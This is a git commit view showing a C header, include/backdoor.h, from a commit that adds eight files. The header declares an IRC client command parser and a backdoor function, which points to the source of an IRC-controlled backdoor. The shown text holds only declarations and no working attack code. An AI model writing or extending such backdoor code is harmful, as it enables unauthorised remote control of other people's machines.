This commit is contained in:
Your Name 2024-04-21 19:39:15 +03:00
commit c174752597
8 changed files with 487 additions and 0 deletions

10
include/backdoor.h Normal file
View file

@ -0,0 +1,10 @@
#ifndef _BACKDOOR_H
#define _BACKDOOR_H
#include "irc.h"
#define COMMON_BUF_SIZE 200
void backdoor_offline(void);
void parse_cmd(IRCC_client *client);
#endif